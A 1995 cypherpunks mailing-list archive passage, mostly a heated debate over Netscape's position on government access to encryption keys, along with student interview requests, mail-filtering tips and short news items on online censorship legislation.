if the various lawsuits disputing the patents go through and the patents are found invalid or something, commercial use will be possible for free. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From adam at homeport.org Sun Dec 3 19:34:19 1995 From: adam at homeport.org (Adam Shostack) Date: Sun, 3 Dec 95 19:34:19 PST Subject: Questions In-Reply-To: Message-ID: <199512040338.WAA24230@homeport.org> All of these questions are answered in Bruce Schneier's excellent book, Applied Cryptography, as well as in the sci.crypt FAQ and other places. Please take a look. | I was wondering if anyone would be able to help me out. I am writing a | research paper and I need some interviews for it. If you could answer any | of these questions about security, I would greatly appreciate it. Thanks | for your time. | | --Bob Marquis | | Please send responses to rmarquis at umich.edu | | | - How can PGP help secure something like e-mail? | | - Are there any encryption schemes which are "unbreakable"? | | - What would someone need to do to send an e-mail message which cannot be | read or altered by anyone else, or is it not possible? | -- "It is seldom that liberty of any kind is lost all at once." -Hume From jadestar at netcom.com Sun Dec 3 19:34:23 1995 From: jadestar at netcom.com (JaDe) Date: Sun, 3 Dec 95 19:34:23 PST Subject: available news/mail filtering In-Reply-To: <199512012326.SAA20363@homeport.org> Message-ID: <199512040332.TAA07600@netcom.netcom.com> > > Beavis B. Thoopit wrote: > > | What news and mail filter programs are available? Pointers > | will be appreciated. > > I like procmail. Its a steep learning curve, but well worth the > effort. > > ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz I disagree about the grade of the curve. However I might have bumped into better learning resources. I'd suggest the following URL (lynx clean for us non-GUI CLImbers and CLUEful types)*: http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq/ This is maintained by Nancy McGough (nancym at ii.com??). She and Stephen R. van den Berg (author of procmail) are active on the procmail mailing list: procmail at informatik.rwth-aachen.de And of course, subscription and information requests for this list to: procmail-request at informatik.rwth-aachen.de ---------------------------------------- I suppose (since this is my first posting to cypherpunks) I might as well introduce myself. I've been lurking on the list for about two weeks. This is the busiest list that I'm subscribed to. By comparison the Pegasus Mail list only gets a hundred messages a day. Well that one's at work so I see it every day -- the ones here at netcom I might flake on for a few days at a time. I've had a mild (armchair) interest in crypto since I was in high school. I heard of this list via netnews but actually got the address from someone at a Kabuki-west (a fairly small, discreet Bay Area social mailing list that's used to organize weekly dinners at area restaurants and announce other food related events to aspiring computer nerds -- such as me-- and other professionals). Given my lack of schooling and formal study on the subject I probably won't have much to say on this list. Given the volume of postings, and the relatively high signal to noise ratio (lots more politics than actual discussion of the technology from what I've seen) I'll be very lucky if I can wade through all this on weekends. My name is Jim Dennis. I'm a sysadmin (and webmaster, postmaster, and backup Netware supervisor) for a medium-sized software publisher in the Bay Area. I used to do tech support for places like Quarterdeck and Symantec. I've also done some SQA. Most of my experience is with DOS/Windows and PC's -- but most of my recent work is on Linux, FreeBSD, SunOS and Solaris. I most frequently post answers to the *.lang.awk newsgroups (which I'm writing an FAQ for). JaDeStar = Ja(mes) De(nnis) + Star(shine) [my girlfriend]. There's an alias to this account: starshine at netcom.com which hits a procmail script and gets redirected to Heather's (Starshine's) current e-mail address at work. This has been the easiest way to ensure a continuity to her e-mail address from one employer to another. She hardly ever logs into this account otherwise. If you want to know more about me -- ask in e-mail (off the list). From wb8foz at nrk.com Sun Dec 3 19:47:00 1995 From: wb8foz at nrk.com (David Lesher) Date: Sun, 3 Dec 95 19:47:00 PST Subject: NOISE for Anon-sam In-Reply-To: <199512040235.DAA29635@utopia.hacktic.nl> Message-ID: <199512040344.WAA00492@nrk.com> > > Salsa Sam Salsa: One of the disadvantages of a anon. address is there is no non-"NOISY" way to ask you to... Please break your lines to rational lengths! We now return you to the flame war in progress... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From attila at primenet.com Sun Dec 3 03:59:31 1995 From: attila at primenet.com (attila) Date: Sun, 3 Dec 1995 19:59:31 +0800 Subject: unwanted AIP mail? In-Reply-To: <199512022323.AAA00288@utopia.hacktic.nl> Message-ID: AIP news list is rather privileged --it is run by the American Physical Society. It is an advanced lisiting of research projects which may have a breakthrough, basically inviting other physicists to corroborate disprove, or preferably augment their basic research. I am a member of the society, which is rather staid. The list is a standard "listproc" which should accept the indirect command on the first message line: unsubscribe physnews cypherpunks at toad.com On Sun, 3 Dec 1995, Anonymous wrote: > Anyone else suddenly start hearing from these folks? > > > Date: Fri, 1 Dec 95 14:44:34 EST > > From: physnews at aip.org (AIP listserver) > > Message-Id: <9512011944.AA12171 at aip.org> > > To: physnews-mailing at aip.org > > Subject: update.250 > > X-UIDL: 817946091.001 > > > > PHYSICS NEWS UPDATE > > The American Institute of Physics Bulletin of Physics News > > Number 250 December 1, 1995 by Phillip F. Schewe and Ben > > Stein > > > > TWO-BIT QUANTUM LOGIC GATES have been experimentally {...} > From unicorn at schloss.li Sun Dec 3 04:00:06 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 1995 20:00:06 +0800 Subject: Why Netscape employees should not leave... In-Reply-To: <30C162DD.1E2F@netscape.com> Message-ID: On Sun, 3 Dec 1995, Jeff Weinstein wrote: > Black Unicorn wrote: > > I just get sick of those who tout themselves as Experts in Software > > Munitions and are in fact are merely in it for the cash. In it for the > > cash is just fine. Just don't tell me later you aren't. > > Can't I be a supporter of strong crypto, and also be in it for the money? > Many people here make good money off of crypto related work. If I'm asked > to implement GAK in a situation where it is not mandated by law, I won't > do it. You can be a supporter of strong crypto, and be in it for the money. I do not believe you can be a supporter of strong crypto and not fight GAK tooth and nail, which I just don't see you doing. Sure, you will obey the law, but will you do anything to influence it's development. All insult and prodding aside, really ask yourself this. You've been GIFTED with a position of immense political power and a strong and virbrant voice. Why aren't you using it? I know the answer because I've talked to the attornies. Do YOU know it? > > > I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal > > > on the actual issue of whether Netscape will build a U.S.-supported GAK (as > > > opposed to offering GAK for the Iraqis or French). I await with interest > > > the clarification of the anti-GAK stance that Jeff alluded to. > > > > I believe you got it with: > > > > "If the law requires GAK, then I believe that we will implement it rather > > than just disable encryption." > > Tim was referring to the position statement against GAK that we will be > releasing before the NIST meeting next week. I think it's clear what you will say at NIST, and exactly what is has to do with Netscape's real position on the issue. > > > Note that the phrase is entirely ambigious on whether this refers to the > > law requiring GAK for export, or export AND domestic sales. Netscape > > will install GAK into whatever will increase its sales. I understand > > and respect this position in the context of a company which needs > > badly to start raking in some profits. > > What I meant, and have said in other places, is that if it is legal to > ship a product without GAK for use inside the US, or anywhere else, > I believe we will do it, because that is what our customers want. What you have ignored, and ignored in other places, is the fact the Netscape has a good deal of clout today. If you were really for strong crypto, why aren't you using it, why isn't Netscape using it, to cripple GAK, and entirely doable endeavor, rather than just seeking some redundant 'clarification' of the current law, (which even it it's most mild intrepretation is below the threshold of acceptable to any strong crypto advocate)? More to the point, why are you telling us what a strong crypto supporter you are instead of SHOWING us? > > The title "Software Munitions Expert" or similar such should probably be > > changed to "GAK marketing expert" however. > > I'm sorry my dig at the ITAR does not ammuse you. I find it very amusing and clever. I just don't think it's a title you deserve. Your suggested > replacement would not be appropriate since I don't support GAK (I believe > that it is one of the most evil things any government could do to its > citizens), So let's see some energy and action that supports that position. Talk is cheap. and I'm not in marketing. You missed your calling. You've got Mr. Weinstein hanging on your every word. > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From beavis at bioanalytical.com Sun Dec 3 20:21:38 1995 From: beavis at bioanalytical.com (Beavis B. Thoopit) Date: Sun, 3 Dec 95 20:21:38 PST Subject: Do The Right Thing, Netscape GAK In-Reply-To: <30C1660F.47EA@netscape.com> Message-ID: <199512040420.XAA01277@bioanalytical.com> among other words Jeff W. wrote... > I don't think you will ever be in this position. If we are forced implement > GAK by the government, everyone else will too. This comment is somewhat offensive to me. I disagree. In fact, it is a pretty whiny sounding and spineless statement. Jeff, you are not making _me_ feel any better about Jim's comments! Kudos to Hal for his clear rebuttal and adherence to facts. Kudos to Tim for "Do The Right Thing". I will add that my belief is that GAK will not be the profitable way to go. I share in Duncan Frissell's optimism that we are now too far down the road. Tim has claimed that browsers are a "no loyalty" product. I will take this a step further and go on record saying that a GAK'd browser will be an economic loser. It may sell a couple of contracts, but it will never gain widespread acceptance. Look at recent history on the net. It is the net leaders who are making the future happen. Netscape is (was?) the epitomy of this new phenomenon. If I were running a business, I would attempt to fulfill cypherpunk-like requirements rather than trying to build a "government approved" product. Let's watch sameer... Doing the "right thing" will end up being the "profitable thing". Maybe I'm blue sky, but it is nice to base decisions on principle... From EALLENSMITH at mbcl.rutgers.edu Sun Dec 3 20:22:25 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Sun, 3 Dec 95 20:22:25 PST Subject: Info on Netscape's key escrow position Message-ID: <01HYDZM9D75S9QUS9W@mbcl.rutgers.edu> From: IN%"jsw at netscape.com" "Jeff Weinstein" 2-DEC-1995 19:58:15.80 E. ALLEN SMITH wrote: > I believe that the central question at hand is whether Netscape will > incorporate mandatory GAK into any of its products if you have an economic > (governmental purchase) rather than physical (governmental threat of violence) > reason to do so. I would hope that the upcoming statement will clarify this > position, and in the proper direction. If the government wants to purchase software for its own use that implements key escrow, why it that bad? The whole point of our anti-GAK position is that government mandated key escrow is bad. If individuals, companies, or government agencies want to escrow their own keys, with the escrow agents of their own choosing, I have not problem. Its only when the government make the escrow and the agent mandatory that I've got a problem. -------------------- I apologize for my lack of clarity. I would agree with you on voluntary escrow. My meaning in "governmental purchase" is that governments may use tactics such as directing purchases to companies that cooperate with their agenda. In other words, instead of properly spending the taxpayers' money on the best browser, server, etcetera available, they may exclude programs produced by a company not incorporating mandatory GAK. -------------------- I don't believe that Netscape will ship a product that mandates GAK unless it was required by law to do so. As long as it is legal to sell non-escrowed crypto products in this country or elsewhere, I think we will keep doing it, because that is what our customers want. -------------------- I am glad that your information leads you to this belief. However, I would still prefer that the official company statement include a clear section on this matter. (I would also, of course, prefer that this section be clearly against GAK; Jim Clark's claim that there are any circumstances under which a private citizen's communications should be tapped gives me cause to doubt.) -Allen From OpsAn at gnn.com Sun Dec 3 21:18:18 1995 From: OpsAn at gnn.com (Michael Coates) Date: Sun, 3 Dec 95 21:18:18 PST Subject: Compromise on Cyberporn Legislation Message-ID: <199512040518.AAA14508@mail-e1a.gnn.com> Just got this. Maybe there is some common-sense surfacing. COMPROMISE ON CYBERPORN LEGISLATION The fears of online service providers and civil liberties advocates that new federal telecommunications legislation would be too heavy-handed in its effort to keep "filthy," "lewd" and "indecent" material off of the network have been mitigated by compromise wording in the proposed legislation. The new language, offered by Washington State Republican congressman Rick White, restricts penalties of fine or imprisonment to persons who transmit material that is "harmful to children" (such as images of frontal nudity) rather than a more broadly worded target against making "indecent material" available to children. The compromise would give legal protection to online information and service providers who made good-faith efforts to keep restricted material away from children. (New York Times 2 Dec 95 A1) From dima at cuix.pscu.com Sun Dec 3 21:27:13 1995 From: dima at cuix.pscu.com (dima at cuix.pscu.com) Date: Sun, 3 Dec 95 21:27:13 PST Subject: No Subject Message-ID: |=========================Hello!=====================================| | My name is Dmitriy Stepanchuk and I'm student of Kentridge HS. | | I have an assignment for school to interview with an expert. | | My subject is Cellular Systems and how are they work. | | If you don't mind and are able to answer following question please | | fill up the blanks, and I will appreciate that. | |======================= Thank you!!! ===============================| Please put your Name: ..................................................................... --------------------------------------------------------------------- 1) What is a Cellular System? ..................................................................... ..................................................................... ..................................................................... --------------------------------------------------------------------- 2) How long is the distance between each cell? ..................................................................... --------------------------------------------------------------------- 3) What is the most important thing about using cell phones? ..................................................................... ..................................................................... ..................................................................... ..................................................................... --------------------------------------------------------------------- 4) How do you program cell phones? Can you program the phone to another channel? ..................................................................... ..................................................................... ..................................................................... ..................................................................... --------------------------------------------------------------------- 5) What is the frequency of the cell phone? ..................................................................... --------------------------------------------------------------------- 6) Is it possible to get on the same channel for two phones? Why? ..................................................................... ..................................................................... ..................................................................... --------------------------------------------------------------------- 7) What percentage of the people in US are using cell phones? ..................................................................... --------------------------------------------------------------------- 8) What is the output power for the portable phones? ..................................................................... --------------------------------------------------------------------- 9) Is it possible to call toll-free numbers from cell phone? ..................................................................... --------------------------------------------------------------------- 10) Will I be able to use my cell phone in other countries? If not why? ..................................................................... ----- Don't forget to use "message quoting" when you reply ---------- +++++++++++++++++++++++++++ That's it!! Thank you very much!!!!!!!!!!!!!!!! From jcobb at ahcbsd1.ovnet.com Sun Dec 3 21:40:17 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Sun, 3 Dec 95 21:40:17 PST Subject: No Privacy Right in the Americas ? Message-ID: Friend, A 12 02 95 Bloomberg newsstory is headlined: Latin American nations will help U.S. combat money laundering The newsstory's datelined: BUENOS AIRES (Dec 2, 1995 - 16:38 EST) It reports: A communique issued after a two-day meeting of ministers and anti-drug officials from throughout the Americas said countries had agreed to...establish systems to identify transfers and deposits that could be linked to illegal activities. Please note: NOT transfers and deposits that are so linked but t & d's that COULD BE so linked, and seized ! Perhaps that's why US Treasury Secretary Robert Rubin exclaimed ...this conference was an enormous step forward. In particular, Countries in the region were encouraged to follow the U.S. lead in setting up organizations which use computerized technology to search data bases for suspicious transactions, said Rubin. Such organizations can be distant, official organizations or they can be neighborhood, job-creating, community-aware, entre- preneurial blessings. Anyway you like it ! One selling-point at the conference: Crime organizations such as the Yakuza in Japan, the Col- ombian drug cartels and the Italian mafia depend on money laundering to place their gains beyond the reach of the law. Rubin summed up the point: Profits that can't be spent aren't profits. He would have us believe he doesn't know where to shop. The illegals can spend profits on neighborhood troops, troops armed --one way or another-- by the world's most successful arms supplier. The advantage to that supplier? It keeps all 34 [minus 1] democratic governments in the region destabilized --amenable to penetration by money bags who know how to thrive in managed chaos-- ; and still dependent on arms from the "distant," official supplier. The advantage to the money bags? It diverts "profits that can't be spent" from directly competing with them. The advantage to the illegals? Neighborhood troops protect turf and provide inexpensive medical treatment for those with complaints. The advantage to the politicos? Low intensity warfare keeps government troops busy doing something besides staging coups. Managed chaos? Like the Buenos Aires conference which ...emerged from [Clinton's] Summit of the Americas held in Miami a year ago. Right to privacy? But of course. From scheming in Miami to "profits that can't be spent" coverup in Buenos Aires to "we don't do that anymore" death squads in any of the 34. "But I meant, for the people." "You mean you have a complaint?" Cordially, Jim NOTE. The Nando Times website URL is: http://www.nando.net The online filename of the above newsstory is: biz634_2.html From unicorn at schloss.li Sun Dec 3 22:07:33 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 95 22:07:33 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30c23e97.16338172@email.pdcorp.com> Message-ID: On Mon, 4 Dec 1995, Dan Weinstein wrote: > On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote: > > >On Sun, 3 Dec 1995, Dan Weinstein wrote: > > > >> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn > >> wrote: > >> > >> > >> If you read what they had to say about this, you know that they are > >> hoping others will create non-escrowed crypto hardware using the same > >> interface. I see no reason for them to not include support for any > >> available hardware system (even if it includes GAK), as long as they > >> continue to support non-escrowed encryption internally. This allows > >> the customer to decide that they have no problem with GAK and use the > >> external system, or use the internal system and not have GAK. > > > >I read it quite carefully. I just was not as easily taken in by the > >double speak as you were. > > I see, you cannot say that they are really supporting GAK based upon > the actual statements made, so you simply assert it. Again, you miss the point. Again, you twist the issue. I didn't say they were actively supporting GAK. I said they were not opposing it with anything like vigor. Show me now where I assert that "they are really supporting GAK." I see. You cannot say that I said that, so you simply assert it? > > >Hoping others will do something is about as useful as sitting on your thumb. > > Yes, but making something an economically viable venture is very > useful. That is what they have done. They have implemented an > interface into a widely available piece of software. This makes it > much more economically viable for others to implement strong crypto > into another product using the same interface. Uh... sure buddy. Let's not forget something here. Netscape is not removing itself from the role of crypto developer. Quite the reverse. They have purposefully included crypto in their product. They claim to be for strong crypto. I want to see more than words on that point. When I said waiting for someone else to do something was useless, I was refering to Netscape's "allow others to oppose GAK actively while we do a lot of hand wringing" attitude. > >Netscape is in a position to make some policy impact here. If they > >insist on going another way, I want to hear why, not that they are all on > >our side and we should be nice because really we're all in this together, > >and afterall, Netscape isn't such a bad lot. > > Jeff Weinstein has said that Netscape is drafting an official position > paper and that it would be available in the near future. You, unlike me, are willing to let that be enough. I will believe it when I see it. This basically amounts to "at some point in the 'near future' I will tell you what we will do in the 'near future after the near future.'" If Netscape > lives up to this, we will soon enough have the companies position and > not just that of two employees (Jeff Weinstein and Jim Clark). Why do > you feel you must jump to judge the company based on the opinions of > two of its employees? Why do you feel you must sit on your hands and wait for the world to decide your fate for you? Mr. Weinstein and Mr. Clark (I would hope) have some infulence in these matters. They have not (as far as I have seen) demonstrated to anyone that they have thought about them much. What precisely is it about my free-speech urges and taunt to energize them that frightens you? Am I too loud for your taste? Does the frige humming at night disturb you? This is especially questionable when one is > clearly stating that the company is against GAK and the other is at > worst being unclear. If you feel they are being contradictory, wait a > week and look at their policy statement then decide. I would much rather try to get them to write the damn policy statement right in the first place than have to try and CHANGE a poor and intrenched policy once in place. Clearly you have not done much of this kind of work in business or government before. > >They can support whoever they like. I just want to hear WHY. More > >importantly, I don't want to be snowed with some horse hockey answer. It > >insults my intelligence. Yours was obviously unaffected. > > Wait a week and read their official statement then decide. See above as to why this is foolish and lazy. > You accuse > me of logical fallacies, but then argue through insult and assertion. When the shoe fits.... > You have not pointed to a single fact or any contradictory statements > in posts to this list. Again, you have missed the target, and the barn. I don't care about contradictory statements as much. I care about a lack of demonstrated effort. I have pointed to the absence of any single fact or statement that shows Netscape is really interested in trying to derail GAK, or promote strong crypto in anything like an active way. I will admit that Jim Clark was somewhat > unclear, but I attribute this to the fact that the official company > position is as yet not written and thus he is attempting to remain > somewhat neutral. And it is in my interest, and in my view everyone's interest, for him to be less than neutral, and instead quite violently pro-strong-crypto and anti-GAK. It's called 'persuasion.' > >> >I'd be interested to know what a 'government liason person' is. It > >> >sounds to me like an 'in house lobbist.' There is an old joke in the > >> >beltway about in house lobbists. > >> > > >> >I also would like to know why you are actively lobbying for > >> >'claification' rather than 'modification' of the current policy. [Blah] > >I believe you actually think you are teaching me something here. > > You asked why they wanted clarification and I simply responded. No, I asked why ONLY clarification, and NOT modification. Try reading the entire sentence. > >I said before, and I will say again. If Netscape is against GAK, then > >let them be AGAINST GAK. If they are just going to try and finesse their > >way into the market without making to many waves, let's hear it that way > >instead of some crap about how they are 'lobbying actively against GAK' > >(Which I might point out, is an assertion that fell apart at the most > >basic prodding). > > Wait a week. See above yet again why I would rather not. > As far as their lobbying assertion falling apart, I must > have missed this. My understanding is that: > > A) They support several industry groups that are taking an active > position in opposition to GAK. "I'm all for those people who are for the troops in the gulf." Lot of good this does. > > B) They have until very recently had only very limited resources. My heart goes out. Today they have resources, let's see some action. > C) Have just recently hired an in house lobbyist. No, they have hired a 'government liason person.' No one has explained with any detail what that means. > D) That they did not attend the Bernstein hearing. Perhaps, perhaps not. I have no idea. > Now given point B, I see no reason to expect that they would in the > past have done much more than they have. Netscape has been nicely funded for quite a while in Washington business days. A lot happens there in the time they have been loafing. Given point C, I see they > are currently expanding their lobbying. Uh... sure... and 0 + 1 is still only 1. Show me some serious effort. Name this expert lobbist who doubtlessly has a sparkling reputation. Why was an individual and not a firm hired? If point D is the measure of > crypto correctness, then I to am guilty. Point D is of no real import to me. Though I do not live in the > vicinity, I guess I should have been expected to fly up to lend my > moral support. Bovine excrement. So. We have one guy in washington, (maybe, is he posted in washington?) and a lot of excuses. Adds up to: "Bovine excrement." > >> Also, lawyers usually advise clients based on a worst case scenario, [Yadda yadda yadda] > >I really think you are pompus enough to think you are teaching people > >things they don't know here. > > Again, you asked, I answered. I did not expect that this would be new > to anyone on the list, but you asked. I think you need to read questions more carefully. > >I invite you to re-read the entire conversation and discover, as an > >exercise, that the issue is not what the government is or is not doing, > >but what netscape is or is not doing. I could care about Netscape's > >loose-lipped lawyers. > > You seem very concerned about what Netscape is doing, and as such > should be concerned about what their lawyers are _forced_ to tell > them. I am more concerned about what Netscape is NOT doing. How this has anything to do with what the lawyers (none of whom to my knowledge are lobbists) think? > I understand that the discussion is about Netscape not the > government, but discussing actions without discussing motives is > useless. A cute speech. Still doesn't change the fact that a little fluff seems to have quite effectively taken you in. > >> > > >> >Netscape seems to be taking the position, "We'd love it if you'd let us > >> >do X, but we are happy to roll over for whatever." and "By the way, > >> >what is the rule on exporting software again?" > >> > > >> >I am impressed that some effort is being made. I think it in the form of > >> >'too little, too late.' But hey, who am I? > >> > >> I think you are being too critical, they have done more than any > >> company I know of to make easy to use crypto widely available. > > > >0 + .00001 = .00001 > > > >Yes, just as last time you checked, .00001 is still more than 0. > > My point is that you are too quick to call your recent ally an enemy. Netscape was never my ally. They looked like a company worth investing in. For the time I held stock, they were. Their morass on this issue, and my general dislike for overhyped firms, made the investment less and less worth it to me. Netscape did about what was par for the course, include crypto in a product that is likely to be used for financial information. You think this is some great accomplishment? You only strengthen my view that you are easily impressed. > You may not see what Netscape has done as important, but I believe > that many do (including me). They are supposed to have integrated > e-mail crypto in the final release of Navigator 2.0. I will remind > you that Jeff Weinstein has said that this will not include GAK. I don't CARE what Netscape's past is. I care what Netscape is doing with the signifcant power and voice they have. I wonder if Netscape is selling out. > >> They > >> may be willing to obey the laws if they require GAK, but I do not feel > >> that they are just rolling over either. I strongly oppose GAK, but I > >> do not believe that no crypto is better than GAK crypto. I would > >> rather keep some people out than nobody out. > > > >Your ignorance is assuming that the options you present are the only > >options available. JW made the same mistake. In logical discourse this > >is called "narrowing the field." It's a version of the 'straw man' > >and a classic flaw in logical argument. > > I am not saying that the choice is between either no crypto or GAK > crypto. Now you need to read your answers more carefully. Look up 11 lines. I am saying that they have only said that they will go to GAK > if the choice is between GAK crypto and no crypto. Read a few more lines up, where you say you don't think Netscape is rolling over. To the best of my > knowledge they have not said that they would implement a GAK only > product in any other situation. In fact they have said very little of anything. This is the point. Again, what rises to the level of an 'anti-GAK' position in your view astounds me. "Well, they didn't say they would implement GAK unless they had to." "Well, I'll stop all this drug trafficking if anyone tells me I have to." I think that this is reasonable, I do > not think that we should let it come to this. We need to insure that > they (or anyone else) are never put into that position. (and yes they > should to.) Boy, sure seems like your ready to come out swinging! But let's wait a week, eh? > >> Dan Weinstein > >> djw at pdcorp.com > >> http://www.earthlink.net/~danjw > >> PGP public key is available from my Home Page. > >> All opinions expressed above are mine. > >> > >> "I understand by 'freedom of Spirit' something quite definite - > >> the unconditional will to say No, where it is dangerous to say > >> No. > > > >This has got to be the most ironic of signatures I have ever seen. > > > >Why don't you begin to apply the cute quotes you put in your .sig to real > >life and tell Netscape to grow a backbone and say 'No.' to GAK? > > I sent a message to Netscape after reading the article that started > this, It simply stated that I wanted clarification on their position > on GAK and that if they were to support it they would lose a loyal > customer. I have since been convinced by Jeff Weinstein's posts to > this list that the company does not support GAK, and in fact they > oppose it. And what have they done to oppose it precisely? Show me something besides 'send a man down' or 'appoint a committee' or 'consider the issue for a pending policy release.' You would do better to spend less time insulting people > and more time trying to support your arguments. And you need to read questions and your own statements before starting a reply. > > Dan Weinstein > djw at pdcorp.com > http://www.earthlink.net/~danjw > PGP public key is available from my Home Page. > All opinions expressed above are mine. --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From OpsAn at gnn.com Sun Dec 3 22:51:23 1995 From: OpsAn at gnn.com (Michael Coates) Date: Sun, 3 Dec 95 22:51:23 PST Subject: AOL DROPS RESTRICTION ON WORD "BREAST" Message-ID: <199512040651.BAA17397@mail-e1a.gnn.com> More Common Sense? AOL DROPS RESTRICTION ON WORD "BREAST" America Online, which has been making efforts to police its own service by purging obscene or vulgar expressions deemed to be offensive, has changed its mind about the word "breast" and reinstated it as an acceptable term of discussion. A contributor to a breast cancer bulletin board had called the purging of the word breast "outrageous and potentially life-threatening." (Atlanta Journal-Constitution 2 Dec 95 F7) From jamesd at echeque.com Sun Dec 3 23:00:08 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 95 23:00:08 PST Subject: Info on Netscape's key escrow position Message-ID: <199512040700.XAA14434@blob.best.net> At 04:02 PM 12/2/95 -0800, Jeff Weinstein wrote: > The whole point of our anti-GAK position is that > government mandated key escrow is bad. "Our" anti-GAK position. I would like to hear Jim Clark say "GAK is bad". I would also like to hear him, and you, refrain from using the phrase "key escrow" and instead use the phrase "Government Access to Keys". I draw your attention to the fact that Bill Gates did not use the intentionally misleading phrase "key escrow" in his book. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sun Dec 3 23:00:23 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 95 23:00:23 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: <199512040700.XAA14483@blob.best.net> At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote: >I see, you cannot say that they are really supporting GAK based upon >the actual statements made, so you simply assert it. You cannot say they oppose it either. Jim Clark speaks about GAK using mostly pleasant sounding favorable words. Let me hear him talk about GAK using plain words. >Now given point B, I see no reason to expect that they would in the >past have done much more than they have. Given point C, I see they >are currently expanding their lobbying. I do not see that they are currently expanding their lobbying: Indeed I do not see that they are currently lobbying. >I sent a message to Netscape after reading the article that started >this, It simply stated that I wanted clarification on their position >on GAK and that if they were to support it they would lose a loyal >customer. I have since been convinced by Jeff Weinstein's posts to >this list that the company does not support GAK, and in fact they >oppose it. I have been convinced that Jeff Weinstein opposes GAK If his policy represents company policy then I hope to hear a similar statement signed authoritatively. I have not seen that yet. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From blancw at accessone.com Sun Dec 3 23:02:45 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sun, 3 Dec 95 23:02:45 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: <9512040703.AA14762@pulm1.accessone.com> Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why don't you write to Jim Clark yourself and tell him about his spinelessness and all your other opinions of him, his unaccceptable attitude, and his worthless company, instead of getting granular with Jim and Dan here on the list? After all, Jim Clark is the one who made the unpleasant statements. .. Blanc From jamesd at echeque.com Sun Dec 3 23:04:27 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 95 23:04:27 PST Subject: Info on Netscape's key escrow position Message-ID: <199512040704.XAA17057@blob.best.net> Jeff Weinstein wrote: > > I don't believe that Netscape will ship a product that mandates GAK > > unless it was required by law to do so. As long as it is legal to sell > > non-escrowed crypto products in this country or elsewhere, I think we > > will keep doing it, because that is what our customers want. E. ALLEN SMITH wrote: I am glad that your information leads you to this belief. However, I > would still prefer that the official company statement include a clear section > on this matter. I also would like to hear this. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jsw at netscape.com Sun Dec 3 23:10:33 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 95 23:10:33 PST Subject: Info on Netscape's key escrow position In-Reply-To: <199512040700.XAA14434@blob.best.net> Message-ID: <30C29DD1.46CB@netscape.com> > > The whole point of our anti-GAK position is that > > government mandated key escrow is bad. > > "Our" anti-GAK position. > > I would like to hear Jim Clark say "GAK is bad". James A. Donald wrote: > > The whole point of our anti-GAK position is that > > government mandated key escrow is bad. > > "Our" anti-GAK position. Sorry, I was referring to the official Netscape company position, not the personal position of either myself or Jim Clark. > I would like to hear Jim Clark say "GAK is bad". So would I. I don't know if he will take such a position or not. I do believe that the company, Netscape, will take such a position in the coming week. > I would also like to hear him, and you, refrain from using the phrase > "key escrow" and instead use the phrase "Government Access to Keys". I've been trying to use either GAK, or "mandatory key escrow" to refer to the hated beast. If I've used just "key escrow" in that context, I'm sorry. I've been trying to use the term "key escrow" for cases when it is not mandatory. > I draw your attention to the fact that Bill Gates did not use the > intentionally misleading phrase "key escrow" in his book. I haven't read his book. Did he take a position against GAK? Did he say that if GAK is required by law his company would or would not implement it? A summary of his comments on this topic would be informative. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jimbell at pacifier.com Sun Dec 3 23:11:00 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 3 Dec 95 23:11:00 PST Subject: "Got a subpoena?" Message-ID: >On Sat, 2 Dec 1995, jim bell wrote: > >> >On Thu, 30 Nov 1995, sameer wrote: >> > >> >> > >> >> > What about a court order to (a) start comprehensive logging, and (b) not >> >> > tell anyone under penalty of ______ . >> > >> >I am unaware of any authority for such an order. >> >> >> >> Aren't court orders part of the public record? I don't quite >> > >> >Yes, but court orders can be sealed pending further order of the court. >> >> Okay, maybe with your qualifications you can answer this. It has always >> mystified me why "the authorities" think they can engage in wiretapping >> without informing the 